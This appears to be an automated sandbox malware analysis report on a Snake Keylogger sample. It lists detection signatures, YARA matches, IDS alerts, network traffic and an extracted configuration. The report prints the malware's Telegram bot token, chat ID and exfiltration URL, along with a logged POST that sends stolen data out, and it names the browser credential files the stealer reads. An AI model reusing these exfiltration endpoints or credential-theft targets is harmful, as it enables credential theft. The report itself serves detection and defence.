Windows Analysis Report
SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe

Overview

General Information

Sample name: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe
Analysis ID: 1618894
MD5: 48303a0f6cf86a64328acc545192bff0
SHA1: 2c9973e30e9697c5c8b6a91ecb3fbc8b05c3b455
SHA256: dcb42b8ad4e7cc40fe12cfef0f5b97fba6073716a6315784ed6dd8847a51e86d
Tags: exe, user-SecuriteInfoCom

Detection

Snake Keylogger
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
.NET source code contains potential unpacker
.NET source code contains very large strings
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Sample uses string decryption to hide its real strings
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

  • System is w10x64
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"C2 url": "https://api.telegram.org/bot7572469755:AAHCBLe3bEv-r8VSlR3NztVSSHz6JBpCC7s/sendMessage"}
{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7572469755:AAHCBLe3bEv-r8VSlR3NztVSSHz6JBpCC7s/sendMessage?chat_id=7207594974", "Token": "7572469755:AAHCBLe3bEv-r8VSlR3NztVSSHz6JBpCC7s", "Chat_id": "7207594974", "Version": "5.1"}
Source: 00000002.00000002.4165208883.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_SnakeKeylogger | Description: Yara detected Snake Keylogger | Author: Joe Security
Source: 00000002.00000002.4165208883.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Description: unknown | Author: unknown
  • 0x14297:$a1: get_encryptedPassword
  • 0x1457b:$a2: get_encryptedUsername
  • 0x140a3:$a3: get_timePasswordChanged
  • 0x1419e:$a4: get_passwordField
  • 0x142ad:$a5: set_encryptedPassword
  • 0x158e5:$a7: get_logins
  • 0x15848:$a10: KeyLoggerEventArgs
  • 0x154b3:$a11: KeyLoggerEventArgsEventHandler
Source: 00000002.00000002.4165208883.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Rule: MALWARE_Win_SnakeKeylogger | Description: Detects Snake Keylogger | Author: ditekSHen
  • 0x19262:$x1: $%SMTPDV$
  • 0x17c34:$x2: $#TheHashHere%&
  • 0x1920a:$x3: %FTPDV$
  • 0x17bd4:$x4: $%TelegramDv$
  • 0x154b3:$x5: KeyLoggerEventArgs
  • 0x15848:$x5: KeyLoggerEventArgs
  • 0x1922e:$m2: Clipboard Logs ID
  • 0x1946c:$m2: Screenshot Logs ID
  • 0x1957c:$m2: keystroke Logs ID
  • 0x19856:$m3: SnakePW
  • 0x19444:$m4: \SnakeKeylogger\
Source: 00000002.00000002.4166196575.00000000029C2000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_SnakeKeylogger | Description: Yara detected Snake Keylogger | Author: Joe Security
Source: 00000002.00000002.4166196575.0000000002920000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_SnakeKeylogger | Description: Yara detected Snake Keylogger | Author: Joe Security

Source: 2.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.400000.0.unpack | Rule: JoeSecurity_SnakeKeylogger | Description: Yara detected Snake Keylogger | Author: Joe Security
Source: 2.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.400000.0.unpack | Rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Description: unknown | Author: unknown
  • 0x14497:$a1: get_encryptedPassword
  • 0x1477b:$a2: get_encryptedUsername
  • 0x142a3:$a3: get_timePasswordChanged
  • 0x1439e:$a4: get_passwordField
  • 0x144ad:$a5: set_encryptedPassword
  • 0x15ae5:$a7: get_logins
  • 0x15a48:$a10: KeyLoggerEventArgs
  • 0x156b3:$a11: KeyLoggerEventArgsEventHandler
Source: 2.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.400000.0.unpack | Rule: MAL_Envrial_Jan18_1 | Description: Detects Encrial credential stealer malware | Author: Florian Roth
  • 0x1be50:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x1b082:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x1b4b5:$a4: \Orbitum\User Data\Default\Login Data
  • 0x1c4f4:$a5: \Kometa\User Data\Default\Login Data
Source: 2.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.400000.0.unpack | Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook | Description: Detects executables with potential process hoocking | Author: ditekSHen
  • 0x1503a:$s1: UnHook
  • 0x15041:$s2: SetHook
  • 0x15049:$s3: CallNextHook
  • 0x15056:$s4: _hook
Source: 2.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.400000.0.unpack | Rule: MALWARE_Win_SnakeKeylogger | Description: Detects Snake Keylogger | Author: ditekSHen
  • 0x19462:$x1: $%SMTPDV$
  • 0x17e34:$x2: $#TheHashHere%&
  • 0x1940a:$x3: %FTPDV$
  • 0x17dd4:$x4: $%TelegramDv$
  • 0x156b3:$x5: KeyLoggerEventArgs
  • 0x15a48:$x5: KeyLoggerEventArgs
  • 0x1942e:$m2: Clipboard Logs ID
  • 0x1966c:$m2: Screenshot Logs ID
  • 0x1977c:$m2: keystroke Logs ID
  • 0x19a56:$m3: SnakePW
  • 0x19644:$m4: \SnakeKeylogger\

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-19T09:38:15.887786+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49736 | 104.21.80.1 | 443 | TCP
2025-02-19T09:38:19.799652+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49744 | 104.21.80.1 | 443 | TCP
2025-02-19T09:38:21.050636+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49746 | 104.21.80.1 | 443 | TCP
2025-02-19T09:38:22.318521+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49748 | 104.21.80.1 | 443 | TCP
2025-02-19T09:38:14.372897+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49734 | 193.122.6.168 | 80 | TCP
2025-02-19T09:38:15.326010+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49734 | 193.122.6.168 | 80 | TCP
2025-02-19T09:38:16.700942+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49738 | 193.122.6.168 | 80 | TCP
2025-02-19T09:38:17.982215+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49741 | 193.122.6.168 | 80 | TCP
2025-02-19T09:38:29.738988+0100 | 2853006 | 1 | A Network Trojan was detected | 192.168.2.4 | 49756 | 149.154.167.220 | 443 | TCP
2025-02-19T09:38:29.559612+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.4 | 49756 | 149.154.167.220 | 443 | TCP

AV Detection

Source: 00000002.00000002.4165208883.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7572469755:AAHCBLe3bEv-r8VSlR3NztVSSHz6JBpCC7s/sendMessage?chat_id=7207594974", "Token": "7572469755:AAHCBLe3bEv-r8VSlR3NztVSSHz6JBpCC7s", "Chat_id": "7207594974", "Version": "5.1"}
Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.7184.2.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7572469755:AAHCBLe3bEv-r8VSlR3NztVSSHz6JBpCC7s/sendMessage"}
Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe | Virustotal: Detection: 37%
Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe | ReversingLabs: Detection: 27%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.raw.unpack | String decryptor:
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.raw.unpack | String decryptor: 7572469755:AAHCBLe3bEv-r8VSlR3NztVSSHz6JBpCC7s
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.raw.unpack | String decryptor: 7207594974

Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49735 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49750 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: JcWm.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe
Source: Binary string: JcWm.pdbSHA256 source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe

Networking

Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49756 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:49756 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: POST /bot7572469755:AAHCBLe3bEv-r8VSlR3NztVSSHz6JBpCC7s/sendDocument?chat_id=7207594974&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd5132f24c205a Host: api.telegram.org Content-Length: 569 Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 193.122.6.168
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49738 -> 193.122.6.168:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49741 -> 193.122.6.168:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49734 -> 193.122.6.168:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49744 -> 104.21.80.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49746 -> 104.21.80.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49736 -> 104.21.80.1:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49748 -> 104.21.80.1:443
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49735 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49750 version: TLS 1.0
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: unknown | HTTP traffic detected: POST /bot7572469755:AAHCBLe3bEv-r8VSlR3NztVSSHz6JBpCC7s/sendDocument?chat_id=7207594974&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd5132f24c205a Host: api.telegram.org Content-Length: 569 Connection: Keep-Alive
Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000029F7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.0000000002829000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000028BC000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.0000000002920000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.0000000002911000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000028D7000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000028E5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.com
Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.0000000002829000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000028BC000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.000000000286C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.0000000002920000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000028F2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.0000000002761000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.0000000002911000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000028D7000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000028E5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.0000000002761000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000000.00000002.1710598493.00000000048EE000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4165208883.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000028BC000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.0000000002920000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.0000000002911000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000028D7000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.0000000002841000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000028E5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://reallyfreegeoip.org
Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000000.00000002.1710093134.0000000003021000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.0000000002761000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe | String found in binary or memory: http://tempuri.org/DataTableUsers.xsd
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000029F7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000029F7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000029F7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7572469755:AAHCBLe3bEv-r8VSlR3NztVSSHz6JBpCC7s/sendDocument?chat_id=7207
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000029F7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.orgH
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.0000000002829000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000028BC000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.000000000286C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.0000000002920000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.0000000002911000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000028D7000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000028E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000000.00000002.1710598493.00000000048EE000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.0000000002829000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4165208883.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000028E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000028BC000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.000000000286C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.0000000002920000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.0000000002911000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000028D7000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000028E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
          Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49756 version: TLS 1.2

          System Summary

          Source: 2.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 2.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 2.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 2.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a23810.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a23810.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a23810.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a87c30.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a87c30.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a87c30.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a87c30.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Snake Keylogger Author: ditekSHen
          Source: 00000002.00000002.4165208883.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 00000002.00000002.4165208883.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Snake Keylogger Author: ditekSHen
          Source: 00000000.00000002.1710598493.00000000048EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 00000000.00000002.1710598493.00000000048EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Snake Keylogger Author: ditekSHen
          Source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe PID: 2828, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe PID: 2828, type: MEMORYSTR Matched rule: Detects Snake Keylogger Author: ditekSHen
          Source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe PID: 7184, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe PID: 7184, type: MEMORYSTR Matched rule: Detects Snake Keylogger Author: ditekSHen
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Form4.cs Long String: Length: 169248
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000000.00000002.1710093134.000000000320C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000000.00000002.1709088113.00000000011AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000000.00000002.1714572943.000000000BAC0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000000.00000000.1679535744.0000000000BD6000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameJcWm.exeF vs SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000000.00000002.1710598493.00000000048EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe
